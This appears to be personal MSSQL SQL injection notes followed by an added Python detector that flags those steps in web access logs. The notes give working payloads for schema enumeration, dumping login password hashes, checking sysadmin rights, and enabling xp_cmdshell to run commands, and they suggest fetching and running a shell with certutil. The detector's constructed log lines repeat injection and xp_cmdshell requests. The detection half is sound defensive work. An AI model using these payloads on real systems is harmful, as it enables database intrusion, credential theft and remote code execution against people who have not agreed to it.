For MySQL/MSSQL: SELECT @@version returns the version; on other databases it errors.
Check how many columns: ORDER BY x, and keep increasing x until an error. The last number that worked is the number of columns.
Concatenating (CONCAT joins two values; STRING_AGG joins all values of a column into one): concat(name1,':',name2) or STRING_AGG(column_name, ',') (SQL Server 2017+ only)
Example:
SELECT+STRING_AGG(name,',')+FROM+master..sysdatabases;
To comment out the rest of the query, append -- after the payload (xx--)
Show all databases: SELECT name FROM master..sysdatabases; show the current database: SELECT DB_NAME()
Show the table names: SELECT name FROM master..sysobjects WHERE xtype = 'U'; (use xtype = 'V' for views) OR for another DB: SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
Show the column names if the table name is mytable:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); (current DB only)
SELECT master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; (list column names and types for master..sometable)
Finally, select from the object: select * from db..table;
See which user: SELECT system_user; OR SELECT user_name();
Password hash:
MSSQL 2000: SELECT name, password FROM master..sysxlogins
MSSQL 2005: SELECT name, password_hash FROM master.sys.sql_logins
Note: If that doesn't work as expected, convert the binary value to hex:
MSSQL 2000: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
MSSQL 2005: SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
Check if you are sysadmin: SELECT is_srvrolemember('sysadmin');
XP_CMDSHELL (in a SQL injection, put a valid query, then ; as a separator, then all of the following; at the end certutil can be used to download a shell and run it):
EXECUTE sp_configure 'show advanced options', 1;
reconfigure;
EXECUTE sp_configure 'xp_cmdshell', 1;
reconfigure;
EXEC xp_cmdshell 'dir';
Error based:
cast(@@version as integer)
If you suspect a SQL injection where stacked queries work but cannot confirm it, you can try running XP_CMDSHELL blindly.
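As an added example (not part of these notes), here is a small Python detector a defender can run over web access logs to spot the enumeration sequence above: ORDER BY column probing, metadata table lookups, credential-hash queries and the sp_configure/xp_cmdshell step. The log format, client addresses and requests are constructed for the example.

```python
import re
from collections import defaultdict
# Signatures derived from the enumeration steps in the notes above: (regex, tag).
# Matching is case-insensitive after '+' is turned back into a space (URL payloads use '+').
SIGNATURES = [
    (r"cast\s*\(\s*@@version\s+as\s+int", "error_based_version"),
    (r"@@version", "version_probe"),
    (r"master\.\.sysdatabases|\bdb_name\s*\(", "db_enum"),
    (r"sysobjects\s+where\s+xtype", "table_enum"),
    (r"\bsyscolumns\b", "column_enum"),
    (r"sysxlogins|sys\.sql_logins|fn_varbintohexstr", "credential_dump"),
    (r"is_srvrolemember", "privilege_check"),
    (r"sp_configure.*xp_cmdshell|\bxp_cmdshell\b", "xp_cmdshell"),
    (r"\bstring_agg\s*\(", "string_agg"),
]
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
LOG_LINE = re.compile(r'^(\S+) .*"(?:GET|POST) (\S+) ')  # client address, request path

def tags_for(request):
    text = request.replace("+", " ")
    return [tag for pat, tag in SIGNATURES if re.search(pat, text, re.I)]

def analyze(lines, probe_threshold=3):
    """Return {client: {tag: count}}; 'order_by_probe' is added when one client
    sends ORDER BY with at least probe_threshold distinct column numbers."""
    findings = defaultdict(lambda: defaultdict(int))
    order_by_values = defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, request = m.groups()
        for tag in tags_for(request):
            findings[client][tag] += 1
        ob = ORDER_BY.search(request.replace("+", " "))
        if ob:
            order_by_values[client].add(int(ob.group(1)))
    for client, values in order_by_values.items():
        if len(values) >= probe_threshold:
            findings[client]["order_by_probe"] = len(values)
    return {c: dict(t) for c, t in findings.items()}

# Constructed sample access-log lines (not real traffic) walking through the steps above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /item?id=1+order+by+1-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02] "GET /item?id=1+order+by+2-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03] "GET /item?id=1+order+by+3-- HTTP/1.1" 500 128',
    '10.0.0.5 - - [01/Jan/2024:10:00:04] "GET /item?id=1+union+select+STRING_AGG(name,%27,%27)+FROM+master..sysdatabases-- HTTP/1.1" 200 900',
    '10.0.0.5 - - [01/Jan/2024:10:00:05] "GET /item?id=1;EXECUTE+sp_configure+%27xp_cmdshell%27,1;reconfigure-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:06] "GET /item?id=7 HTTP/1.1" 200 512',
]
```

Running analyze(SAMPLE_LOG) reports only 10.0.0.5, with the probe count and the db_enum, string_agg and xp_cmdshell tags; the benign 10.0.0.9 request produces nothing.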